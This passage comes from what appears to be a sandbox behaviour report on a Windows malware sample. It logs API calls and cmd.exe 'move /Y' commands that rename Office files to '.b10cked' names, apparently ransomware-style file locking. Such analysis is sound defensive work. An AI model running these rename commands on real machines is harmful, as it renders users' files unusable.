lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e8cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e8cc) returned 0x302130 [0175.298] FindNextFileW (in: hFindFile=0x302130, lpFindFileData=0x20e8cc | out: lpFindFileData=0x20e8cc) returned 0 [0175.299] GetLastError () returned 0x12 [0175.299] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0175.300] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x301cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301cc0) returned 0x302130 [0175.300] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0175.300] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x20eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0175.300] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll")) returned 0x2020 [0175.300] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0175.301] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0175.301] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20eb18 | out: _Buffer=" 1") returned 9 [0175.301] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.301] GetFileType (hFile=0x7) returned 0x2 [0175.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eaa4 | out: lpMode=0x20eaa4) returned 1 [0175.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ead8 | out: lpConsoleScreenBufferInfo=0x20ead8) returned 1 [0175.338] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0175.338] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20eb18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0175.338] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20eafc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eafc*=0x1a) returned 1 [0175.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.339] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.339] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.339] SetConsoleInputExeNameW () returned 0x1 [0175.339] GetConsoleOutputCP () returned 0x1b5 [0175.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.339] exit (_Code=0) Process: id = "312" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24079 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24081 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 24082 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24086 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24124 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24125 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24126 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24127 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 24128 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 24129 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24130 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24131 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24132 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24133 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24134 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24135 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24136 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24137 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24138 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24139 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24140 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24141 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 24142 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24143 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 24144 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 24145 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 24146 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 24147 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 413 os_tid = 0x638 [0175.234] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f9dc | out: lpSystemTimeAsFileTime=0x28f9dc*(dwLowDateTime=0x9e58d6e0, dwHighDateTime=0x1d440a9)) [0175.234] GetCurrentProcessId () returned 0xe38 [0175.234] GetCurrentThreadId () returned 0x638 [0175.234] GetTickCount () returned 0x32efb [0175.234] QueryPerformanceCounter (in: lpPerformanceCount=0x28f9d4 | out: lpPerformanceCount=0x28f9d4*=23202340205) returned 1 [0175.235] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.235] __set_app_type (_Type=0x1) [0175.235] __p__fmode () returned 0x76b331f4 [0175.235] __p__commode () returned 0x76b331fc [0175.235] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.235] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0175.235] GetCurrentThreadId () returned 0x638 [0175.235] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x638) returned 0x38 [0175.235] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.235] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.235] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.237] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f96c | out: phkResult=0x28f96c*=0x0) returned 0x2 [0175.237] VirtualQuery (in: lpAddress=0x28f9a3, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0175.237] GetConsoleOutputCP () returned 0x1b5 [0175.237] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.238] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.238] GetEnvironmentStringsW () returned 0x470210* [0175.239] FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.239] GetEnvironmentStringsW () returned 0x470210* [0175.239] FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8dc | out: phkResult=0x28e8dc*=0x40) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0xa0, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x0, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegCloseKey (hKey=0x40) returned 0x0 [0175.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8dc | out: phkResult=0x28e8dc*=0x40) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x0, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegCloseKey (hKey=0x40) returned 0x0 [0175.239] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.239] srand (_Seed=0x5b88638b) [0175.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" [0175.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" [0175.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.240] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0175.240] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0175.240] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0175.240] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0175.240] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0175.241] GetEnvironmentStringsW () returned 0x472360* [0175.241] FreeEnvironmentStringsW (penv=0x472360) returned 1 [0175.241] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.241] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.241] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.241] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f6a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.241] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f6a8, lpFilePart=0x28f6a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f6a4*="Desktop") returned 0x18 [0175.241] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.241] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.241] FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.242] FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f424 | out: lpFindFileData=0x28f424) returned 0x4709f0 [0175.242] FindClose (in: hFindFile=0x4709f0 | out: hFindFile=0x4709f0) returned 1 [0175.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.242] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.242] GetEnvironmentStringsW () returned 0x470210* [0175.242] FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.243] GetConsoleOutputCP () returned 0x1b5 [0175.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.243] GetUserDefaultLCID () returned 0x409 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="0") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="0") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7e8, cchData=128 | out: lpLCData="1") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.243] GetLocaleInfoW (in: 